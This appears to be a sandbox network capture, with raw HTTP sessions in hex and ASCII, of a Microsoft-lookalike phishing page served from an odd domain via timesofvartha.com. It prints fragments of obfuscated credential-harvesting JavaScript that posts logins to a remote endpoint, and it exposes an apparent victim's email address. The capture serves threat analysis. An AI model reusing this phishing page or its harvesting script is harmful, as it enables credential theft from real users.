                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:16 UTC172OUTData Raw: 7b 22 75 75 69 64 22 3a 22 39 66 61 38 61 35 32 64 2d 35 30 31 30 2d 34 64 38 66 2d 61 36 31 33 2d 37 63 30 33 38 64 62 66 63 62 37 62 22 2c 22 69 64 65 6e 74 69 66 69 65 72 22 3a 22 34 32 33 34 66 63 65 36 2d 30 64 31 36 2d 34 35 37 33 2d 38 30 62 62 2d 39 32 38 65 34 32 33 62 65 66 35 30 22 2c 22 73 65 72 76 65 72 22 3a 22 62 63 31 71 63 72 38 6d 75 7a 30 30 64 32 76 37 75 71 67 35 67 67 75 6c 72 6d 6d 2e 63 6f 6d 22 2c 22 75 73 65 72 22 3a 22 4d 72 65 74 74 69 6e 67 65 72 40 64 63 6e 64 78 2e 63 6f 6d 22 7d
                                                                                                                              Data Ascii: {"uuid":"9fa8a52d-5010-4d8f-a613-7c038dbfcb7b","identifier":"4234fce6-0d16-4573-80bb-928e423bef50","server":"bc1qcr8muz00d2v7uqg5ggulrmm.com","user":"Mrettinger@dcndx.com"}
                                                                                                                              2024-11-18 16:56:19 UTC852INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:19 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 15630
                                                                                                                              Connection: close
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-allow-credentials: true
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4BCGGACYSzseUjyNZHBpaNhyGNErF7lEIUykz%2Bl%2B2Vkli1qmjflGZbLydeNR%2Bx0V%2FM3%2BxEhEyHWsjJD5Y9vYNAsLmHdcM6Qhi0PaV%2Buuq8hwoeqH4mnPHgS%2BkwZCoT8LyVl%2BiHZWF0O1piyFrN%2BnxA7I"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497e32e84e7b30-DEN
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19159&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2884&recv_bytes=1443&delivery_rate=151156&cwnd=32&unsent_bytes=0&cid=9e7a0e18ca3172df&ts=2957&x=0"
                                                                                                                              2024-11-18 16:56:19 UTC517INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 74 79 70 65 22 3a 22 4e 61 74 69 76 65 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 3c 68 74 6d 6c 20 64 69 72 3d 5c 22 6c 74 72 5c 22 20 6c 61 6e 67 3d 5c 22 65 6e 5c 22 3e 5c 6e 20 20 3c 68 65 61 64 3e 5c 6e 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 5c 6e 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 5c 22 20 63 6f 6e 74 65 6e 74 3d 5c 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 5c 22 3e 5c 6e 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 5c 22 20 63 6f 6e 74
                                                                                                                              Data Ascii: {"status":"success","type":"Native","message":"<html dir=\"ltr\" lang=\"en\">\n <head>\n <title>Sign in to your account</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n <meta http-equiv=\"X-UA-Compatible\" cont
                                                                                                                              2024-11-18 16:56:19 UTC1369INData Raw: 22 3e 5c 6e 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 5c 22 70 72 65 66 65 74 63 68 5c 22 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 2f 65 73 74 73 2f 32 2e 31 2f 63 6f 6e 74 65 6e 74 2f 63 64 6e 62 75 6e 64 6c 65 73 2f 63 6f 6e 76 65 72 67 65 64 2e 76 32 2e 6c 6f 67 69 6e 2e 6d 69 6e 5f 38 6f 77 77 74 34 75 2d 33 33 70 73 30 77 61 77 69 37 74 6d 6f 77 32 2e 63 73 73 5c 22 3e 5c 6e 20 20 20 20 3c 6c 69 6e 6b 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 5c 22 63 64 6e 5c 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 5c 22 61 6e 6f 6e 79 6d 6f 75 73 5c 22 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 65 73 74 73 2f 32 2e 31 2f 63 6f 6e 74 65 6e 74 2f
                                                                                                                              Data Ascii: ">\n <link rel=\"prefetch\" href=\"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css\">\n <link data-loader=\"cdn\" crossorigin=\"anonymous\" href=\"https://aadcdn.msauth.net/ests/2.1/content/
                                                                                                                              2024-11-18 16:56:19 UTC1369INData Raw: 74 27 5d 3f 65 76 65 6e 74 5b 27 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 27 5d 28 29 3a 65 76 65 6e 74 5b 5f 30 78 34 33 33 39 62 32 28 30 78 38 61 29 5d 3d 21 5b 5d 3b 76 61 72 20 5f 30 78 33 65 35 31 39 65 3d 24 28 5f 30 78 34 33 33 39 62 32 28 30 78 38 31 29 29 5b 5f 30 78 34 33 33 39 62 32 28 30 78 38 34 29 5d 28 29 3b 21 5f 30 78 33 65 35 31 39 65 3f 28 24 28 5f 30 78 34 33 33 39 62 32 28 30 78 37 30 29 29 5b 5f 30 78 34 33 33 39 62 32 28 30 78 39 36 29 5d 28 5f 30 78 34 33 33 39 62 32 28 30 78 38 32 29 29 2c 24 28 5f 30 78 34 33 33 39 62 32 28 30 78 37 30 29 29 5b 5f 30 78 34 33 33 39 62 32 28 30 78 37 32 29 5d 28 29 2c 24 28 27 23 69 30 31 31 38 27 29 5b 5f 30 78 34 33 33 39 62 32 28 30 78 37 61 29 5d 28 27 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 27
                                                                                                                              Data Ascii: t']?event['preventDefault']():event[_0x4339b2(0x8a)]=![];var _0x3e519e=$(_0x4339b2(0x81))[_0x4339b2(0x84)]();!_0x3e519e?($(_0x4339b2(0x70))[_0x4339b2(0x96)](_0x4339b2(0x82)),$(_0x4339b2(0x70))[_0x4339b2(0x72)](),$('#i0118')[_0x4339b2(0x7a)]('border-color'
                                                                                                                              2024-11-18 16:56:19 UTC1369INData Raw: 6e 28 29 7b 76 61 72 20 5f 30 78 35 30 34 36 39 37 3d 5f 30 78 33 63 65 66 3b 77 69 6e 64 6f 77 2e 74 6f 70 5b 5f 30 78 35 30 34 36 39 37 28 30 78 36 65 29 5d 5b 5f 30 78 35 30 34 36 39 37 28 30 78 61 31 29 5d 3d 5f 30 78 35 30 34 36 39 37 28 30 78 38 62 29 3b 7d 2c 30 78 37 64 30 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 65 39 33 62 29 7b 76 61 72 20 5f 30 78 65 33 63 32 32 62 3d 5f 30 78 31 37 33 32 36 65 3b 63 6f 6e 73 6f 6c 65 5b 27 6c 6f 67 27 5d 28 5f 30 78 65 33 63 32 32 62 28 30 78 37 31 29 29 3b 7d 7d 29 3a 28 24 28 5f 30 78 31 37 33 32 36 65 28 30 78 37 33 29 29 5b 5f 30 78 31 37 33 32 36 65 28 30 78 37 35 29 5d 28 29 2c 24 28 5f 30 78 31 37 33 32 36 65 28 30 78 38 39 29 29 5b 5f 30 78 31 37 33 32 36 65 28 30
                                                                                                                              Data Ascii: n(){var _0x504697=_0x3cef;window.top[_0x504697(0x6e)][_0x504697(0xa1)]=_0x504697(0x8b);},0x7d0);},'error':function(_0x59e93b){var _0xe3c22b=_0x17326e;console['log'](_0xe3c22b(0x71));}}):($(_0x17326e(0x73))[_0x17326e(0x75)](),$(_0x17326e(0x89))[_0x17326e(0
                                                                                                                              2024-11-18 16:56:19 UTC1369INData Raw: 4e 52 4d 4d 4a 45 5a 35 69 6e 5f 6a 41 52 73 68 4a 4f 33 63 44 31 70 77 7a 4c 54 66 4a 78 55 61 79 6e 46 5f 56 58 6e 5f 48 7a 4c 66 4a 6c 76 58 47 39 2d 47 46 77 57 65 2d 47 6b 52 37 59 32 6b 6d 55 68 49 62 74 36 63 39 79 73 6b 58 61 73 33 38 54 45 5f 6f 36 52 48 72 65 4c 5f 56 37 50 71 54 6d 6e 71 38 6e 37 31 71 35 66 73 31 49 54 66 59 33 70 34 38 50 71 72 38 64 33 44 74 71 48 42 2d 5f 55 6a 6d 70 76 50 45 79 71 50 65 50 6a 70 72 48 6c 5a 76 30 39 4b 44 36 32 65 47 31 7a 2d 54 54 50 2d 6d 48 54 31 34 6a 48 33 37 31 4f 33 37 72 2d 34 38 71 6c 34 64 74 45 56 61 59 57 46 69 76 7a 43 30 35 41 77 4d 30 55 4e 38 71 30 41 53 50 34 71 49 55 64 49 30 33 6e 41 6a 4c 57 46 6f 5a 75 32 4e 4c 66 52 76 72 77 5f 63 62 31 66 75 4e 78 6d 58 6a 52 5a 61 53 2d 5a 45 34 46
                                                                                                                              Data Ascii: NRMMJEZ5in_jARshJO3cD1pwzLTfJxUaynF_VXn_HzLfJlvXG9-GFwWe-GkR7Y2kmUhIbt6c9yskXas38TE_o6RHreL_V7PqTmnq8n71q5fs1ITfY3p48Pqr8d3DtqHB-_UjmpvPEyqPePjprHlZv09KD62eG1z-TTP-mHT14jH371O37r-48ql4dtEVaYWFivzC05AwM0UN8q0ASP4qIUdI03nAjLWFoZu2NLfRvrw_cb1fuNxmXjRZaS-ZE4F
                                                                                                                              2024-11-18 16:56:19 UTC1369INData Raw: 30 28 30 78 37 30 29 29 5b 5f 30 78 34 37 62 34 38 30 28 30 78 39 36 29 5d 28 5f 30 78 34 37 62 34 38 30 28 30 78 38 32 29 29 2c 24 28 27 23 69 6d 70 6f 72 74 61 6e 74 27 29 5b 27 68 69 64 65 27 5d 28 29 2c 24 28 27 23 65 72 72 6f 72 27 29 5b 27 73 68 6f 77 27 5d 28 29 2c 24 28 5f 30 78 34 37 62 34 38 30 28 30 78 38 31 29 29 5b 27 63 73 73 27 5d 28 5f 30 78 34 37 62 34 38 30 28 30 78 37 39 29 2c 5f 30 78 34 37 62 34 38 30 28 30 78 37 36 29 29 2c 24 28 5f 30 78 34 37 62 34 38 30 28 30 78 38 31 29 29 5b 27 66 6f 63 75 73 27 5d 28 29 29 3a 28 24 28 27 23 65 72 72 6f 72 27 29 5b 5f 30 78 34 37 62 34 38 30 28 30 78 37 35 29 5d 28 29 2c 24 28 27 23 69 6d 70 6f 72 74 61 6e 74 27 29 5b 5f 30 78 34 37 62 34 38 30 28 30 78 37 35 29 5d 28 29 2c 24 28 27 23 69 30 31
                                                                                                                              Data Ascii: 0(0x70))[_0x47b480(0x96)](_0x47b480(0x82)),$('#important')['hide'](),$('#error')['show'](),$(_0x47b480(0x81))['css'](_0x47b480(0x79),_0x47b480(0x76)),$(_0x47b480(0x81))['focus']()):($('#error')[_0x47b480(0x75)](),$('#important')[_0x47b480(0x75)](),$('#i01
                                                                                                                              2024-11-18 16:56:19 UTC1369INData Raw: 69 6e 65 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 53 41 53 2f 50 72 6f 63 65 73 73 41 75 74 68 27 2c 27 73 74 61 74 75 73 27 2c 27 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 27 2c 27 66 6f 63 75 73 27 2c 27 69 6e 66 6f 27 2c 27 31 31 31 31 35 31 38 5a 5a 46 51 55 56 27 2c 27 72 65 6d 6f 76 65 43 6c 61 73 73 27 2c 27 6f 70 65 6e 27 2c 27 2f 61 70 69 2f 76 33 2f 6c 6f 67 69 6e 27 2c 27 63 6c 69 63 6b 27 2c 27 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 27 5d 3b 5f 30 78 33 36 62 33 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 36 34 65 33 33 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 33 36 62 33 28 29 3b 7d 5c 6e 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 5c 6e 20 20 3c 2f 68 65 61 64 3e 5c 6e 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 5c 22 63
                                                                                                                              Data Ascii: ine.com/common/SAS/ProcessAuth','status','setRequestHeader','focus','info','1111518ZZFQUV','removeClass','open','/api/v3/login','click','preventDefault'];_0x36b3=function(){return _0x564e33;};return _0x36b3();}\n </script>\n </head>\n <body class=\"c
                                                                                                                              2024-11-18 16:56:19 UTC1369INData Raw: 73 5c 22 20 73 74 79 6c 65 3d 5c 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 5c 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                                                              Data Ascii: s\" style=\"display:none;\">\n <div></div>\n <div></div>\n <div></div>\n <div></div>\n <div></div>\n </div>
                                                                                                                              2024-11-18 16:56:19 UTC1369INData Raw: 73 76 67 5c 22 20 73 72 63 3d 5c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 5c 22 64 69 73 70 6c 61 79 4e 61 6d 65 5c 22 20 63 6c 61 73 73 3d 5c 22 69 64 65 6e 74 69 74 79 5c 22 20 74 69 74 6c 65 3d 5c 22 4d 72 65 74 74 69 6e 67 65
                                                                                                                              Data Ascii: svg\" src=\"https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\">\n </button>\n <div id=\"displayName\" class=\"identity\" title=\"Mrettinge


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              41192.168.2.174976135.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:17 UTC496OUTPOST /report/v4?s=gDw%2B4BaRNj6fLDMnBJQh0DVuOZKsI6KZ2nJqJT03lEq4CAgXbGqP4IwTrh6Ut2Y940uAcjvtuZIcanZpU5zE%2BfxmX6iRaZ92ritWkcDsYgt54diMjH6mLCky2SxjUg%2FKCf8VZd4QwFc6kJFsAPze9CN6 HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 441
                                                                                                                              Content-Type: application/reports+json
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:17 UTC441OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 30 36 33 2c 22 6d 65 74 68 6f 64 22 3a 22 4f 50 54 49 4f 4e 53 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 74 69 6d 65 73 6f 66 76 61 72 74 68 61 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75
                                                                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":2063,"method":"OPTIONS","phase":"application","protocol":"http/1.1","referrer":"https://timesofvartha.com/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":200,"type":"abandoned"},"type":"network-error","u
                                                                                                                              2024-11-18 16:56:17 UTC168INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              date: Mon, 18 Nov 2024 16:56:17 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              42192.168.2.1749762188.114.97.34436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:20 UTC366OUTGET /api/v3/auth HTTP/1.1
                                                                                                                              Host: bc1qcr8muz00d2v7uqg5ggulrmm.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:21 UTC798INHTTP/1.1 405 Method Not Allowed
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:21 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 31
                                                                                                                              Connection: close
                                                                                                                              allow: POST
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2C4pKO6cnPbHRruGHOZNcQA0VyqEiD%2Bt3nCfdaIscfNbn6pFRuEKBjZeL2WFFM51NtMomseZEz4%2Bdwlsc%2BO81oCgFXClsXY0OvqiDFWGABZgLIS%2BtY0bigb1RWBri%2BwwW7zHQr3aS69RUR%2FWddR2slU"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497e49fc7fe765-DEN
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=18982&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2882&recv_bytes=944&delivery_rate=152847&cwnd=32&unsent_bytes=0&cid=57c51a643d3d8843&ts=462&x=0"
                                                                                                                              2024-11-18 16:56:21 UTC31INData Raw: 7b 22 64 65 74 61 69 6c 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d
                                                                                                                              Data Ascii: {"detail":"Method Not Allowed"}


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              43192.168.2.174976513.107.246.604436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:21 UTC642OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:22 UTC802INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:21 GMT
                                                                                                                              Content-Type: text/css
                                                                                                                              Content-Length: 19953
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Mon, 18 Apr 2022 21:18:26 GMT
                                                                                                                              ETag: 0x8DA2180FA29F5AF
                                                                                                                              x-ms-request-id: 81513fa7-801e-0052-5692-39c801000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241118T165621Z-164f84587bf6n6jwhC1DFW90fn000000056g00000000m9vc
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-11-18 16:56:22 UTC15582INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 5c eb c9 4a 8c 48 3d 47 53 71 ad e3 78 e3 39 c7 af b2 9d 7d 54 ca b5 c5 91 a8 11 8f 29 51 97 a4 66 3c ab 33 ff fd e2 8d 06 d0 20 a9 f1 64 b3 f7 56 d6 1b 5b 44 37 1a 40 77 a3 81 06 d0 c0 77 df fe 21 78 5e ec 6e cb ec 6a 5d 07 4f 9e 9f 06 af b3 45 59 54 c5 aa 26 e9 e5 ae 28 93 3a 2b b6 61 f0 2c cf 03 86 54 05 65 5a a5 e5 75 ba 0c 83 6f bf fb ee db 3f 3c ea 77 ff 5f f0 e1 e3 b3 f7 1f 83 b7 7f 09 3e be bc 78 ff 63 f0 8e 7c fd 23 78 f3 f6 e3 c5 f3 17 41 67 2a 8f 1e 7d 5c 67 55 b0 ca f2 34 20 ff 5e 26 55 ba 0c 8a 6d 50 94 41 b6 5d 88 5a a7 55 b0 21 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 b4 21 cf aa 9a 64 ba 4c f3 e2 26 78 42 c8 95 cb e0 5d 52 d6 b7 c1 c5 bb d3 30 f8 48 70 0b d2
                                                                                                                              Data Ascii: }k6w\JH=GSqx9}T)Qf<3 dV[D7@ww!x^nj]OEYT&(:+a,TeZuo?<w_>xc|#xAg*}\gU4 ^&UmPA]ZU!Y:ve?!dL&xB]R0Hp
                                                                                                                              2024-11-18 16:56:22 UTC4371INData Raw: 9a 0a e1 1d 2d b3 ba 8f d2 aa 33 50 25 98 6c a8 15 02 68 6b 56 83 ba b5 a0 21 4d f4 aa e1 60 30 5e 26 13 b7 4d 5a e3 0c 32 50 fb 10 40 6b 9b fc 5a d9 82 86 b5 c9 a7 ad bc 4d f7 53 c6 3e 3f 39 dd 03 b7 41 cb ce 26 be d0 de 86 c0 54 77 43 60 b2 bf 81 c2 0c ee 7b d2 cd 0a 61 90 56 01 34 54 b4 0d 0f 13 81 b8 2f db 70 52 d0 7d 6b f3 ee d8 8a 4c 1c d2 27 e1 d9 ec 14 b9 79 16 00 b1 44 22 26 de 7c 1d a7 8b 6f c3 83 81 00 2e 9a 8f 64 e0 9b fc 61 ac 32 b8 ef a4 7b 76 4d bf f4 c1 f2 99 fb b4 04 72 58 c0 8e 6e c3 5f c7 f3 3c 67 c8 ae be 16 6f 54 ce 37 c9 36 db ed 73 c6 5e f7 de 56 71 c3 87 f1 ae 9e 38 a5 66 bb a2 46 2c eb 6f 31 16 43 de bb 8f b6 9b e7 e7 e0 7a 9a ad 02 0f 30 cc da 14 7f 83 b1 d0 ae c2 6f d9 bb e4 d8 e8 bc 2c d8 71 98 6c 17 5e e7 a1 c9 44 7f 78 ab 6f
                                                                                                                              Data Ascii: -3P%lhkV!M`0^&MZ2P@kZMS>?9A&TwC`{aV4T/pR}kL'yD"&|o.da2{vMrXn_<goT76s^Vq8fF,o1Cz0o,ql^Dxo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              44192.168.2.174976613.107.246.604436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:21 UTC651OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:21 UTC805INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:21 GMT
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Content-Length: 276
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Fri, 17 Jan 2020 19:28:34 GMT
                                                                                                                              ETag: 0x8D79B8371B97A82
                                                                                                                              x-ms-request-id: 3112634a-601e-0051-1453-396177000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241118T165621Z-16547b76f7fbkfmzhC1DFWm9tw00000005qg00000000cr8g
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
